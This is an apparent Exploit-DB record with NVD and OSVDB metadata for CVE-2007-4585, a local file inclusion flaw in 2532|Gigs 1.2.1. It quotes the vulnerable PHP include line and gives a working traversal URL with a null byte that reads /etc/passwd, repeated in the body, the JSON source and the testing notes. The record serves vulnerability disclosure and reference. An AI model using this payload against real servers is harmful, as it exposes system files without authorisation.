ID EDB-ID:4317
Type exploitdb
Reporter bd0rk
Modified 2007-08-26T00:00:00
Description
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability. CVE-2007-4585. Webapps exploit for php platform
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability
Discovered by bd0rk || SOH-Crew
www.soh-crew.it.tt
The German Coding and IT-Security Resource
-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°-°
Vendor: http://www.2532gigs.com
Download: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip
License: Free
Vulnerable Code: include_once("languages/$language/settings.php");
Exploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00
Greetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32
####The 18-year-old German hacker bd0rk####
# milw0rm.com [2007-08-26]
{"id": "EDB-ID:4317", "hash": "8bd0fc378f8656671625f84afac47c79", "type": "exploitdb", "bulletinFamily": "exploit", "title": "2532/Gigs 1.2.1 - activateuser.php Local File Inclusion Vulnerability", "description": "2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability. CVE-2007-4585. Webapps exploit for php platform", "published": "2007-08-26T00:00:00", "modified": "2007-08-26T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/4317/", "reporter": "bd0rk", "references": [], "cvelist": ["CVE-2007-4585"], "lastseen": "2016-01-31T20:38:15", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 2.1, "vector": "NONE"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-4585"]}, {"type": "osvdb", "idList": ["OSVDB:36687"]}], "modified": "2016-01-31T20:38:15"}, "vulnersScore": 2.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/4317/", "sourceData": " -\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0\r\n\r\n 2532|Gigs 1.2.1 (activateuser.php) Local File Inclusion Vulnerability\r\n\r\n Discovered by bd0rk || SOH-Crew\r\n\r\n www.soh-crew.it.tt\r\n\r\n The german Coding and IT-Security Ressource\r\n\r\n -\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0-\u00b0\r\n\r\n\r\nVendor: http://www.2532gigs.com\r\n\r\nDownload: http://belnet.dl.sourceforge.net/sourceforge/gigs-2532/2532Gigs_1.2.1_stable.zip\r\n\r\nLicense: Free\r\n\r\nVulnerable Code: 
include_once(\"languages/$language/settings.php\");\r\n\r\n\r\n\r\nExploit: http://[h0sT]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00\r\n\r\n\r\n\r\nGreetings: str0ke, TheJT, GolD_M, die steffi, khaliDb, x0r_32\r\n\r\n\r\n####The 18 years old, german Hacker bd0rk####\r\n\r\n# milw0rm.com [2007-08-26]\r\n", "osvdbidlist": ["36687"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-09-29T14:25:29", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in activateuser.php in 2532|Gigs 1.2.1 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the language parameter.", "modified": "2017-09-28T21:29:19", "published": "2007-08-28T21:17:00", "id": "CVE-2007-4585", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-4585", "title": "CVE-2007-4585", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "description": "## Technical Description\nThis vulnerability is only present when the magic_quotes_gpc PHP option is 'off' and the register_globals PHP option is 'on' (not the default setting for PHP since version 4.2.0 / 22-Apr-2002).\n## Manual Testing Notes\nhttp://[target]/[dir]/activateuser.php?language=../../../../../../../../etc/passwd%00\n## References:\n[Secunia Advisory ID:26585](https://secuniaresearch.flexerasoftware.com/advisories/26585/)\nOther Advisory URL: http://milw0rm.com/exploits/4317\nISS X-Force ID: 36267\nFrSIRT Advisory: ADV-2007-2968\n[CVE-2007-4585](https://vulners.com/cve/CVE-2007-4585)\nBugtraq ID: 25449\n", "modified": "2007-08-26T00:00:00", "published": "2007-08-26T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:36687", "id": "OSVDB:36687", "title": "2532|Gigs activateuser.php language Variable Traversal Local File Inclusion", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}